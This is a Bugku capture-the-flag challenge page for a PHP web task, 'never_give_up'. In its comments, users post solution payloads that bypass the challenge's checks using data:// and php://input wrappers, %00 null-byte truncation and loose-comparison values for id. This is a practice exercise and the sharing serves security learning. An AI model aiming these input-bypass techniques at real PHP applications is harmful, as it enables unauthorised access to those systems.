never_give_upWEB 未解决

分数: 25 金币: 3
题目作者: 未知
一  血: blue
一血奖励: 1金币
解  决: 4626
提  示:
描  述:
作者:御结冰城
评论
ly89130 1月前

http://160.202.254.160:14094/hello.php?id=abc&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=.4fffd

回复 0

fi1y 1月前

id=00&a=php://input,bugku%20is%20a%20nice%20plateform!&b=.12345

回复 0

暗流安全 3月前

/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111

回复 0

FTJJJ 4月前

POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!

回复 0

bugfuck2 4月前

查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a

回复 0

霓虹 8月前

wp解答的源代码不一样,避雷

回复 1

对对对对对对对对 9月前

依旧有点意思

回复 0

soha 10月前

$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参

回复 1

caicai0728 10月前

解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501

回复 2
浩气英风 1月前

试了评论区所有的方法,就你这个能成功。

回复 0

2686213396 1年前

bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag

回复 0

WriteUp

image
harry

3 金币

评分(28)

解题动态

小白d 攻破了该题 6小时前
23091 攻破了该题 4天前
mmbsklm 攻破了该题 5天前
ggsea 攻破了该题 7天前
__tian__ 攻破了该题 8天前
ipos 攻破了该题 8天前
lixing123 攻破了该题 10天前
whshkdh 攻破了该题 12天前
白色狸花猫 攻破了该题 12天前
i8vkmmju 攻破了该题 13天前
chihaya anon 攻破了该题 14天前
Phantheon 攻破了该题 15天前
zjh240609 攻破了该题 16天前
lyosauway 攻破了该题 17天前
658658xzlz 攻破了该题 18天前
布蕾脆脆奶芙 攻破了该题 19天前
yazhou 攻破了该题 20天前
VCD 攻破了该题 20天前
耶无忧 攻破了该题 22天前
kimol 攻破了该题 23天前
问题反馈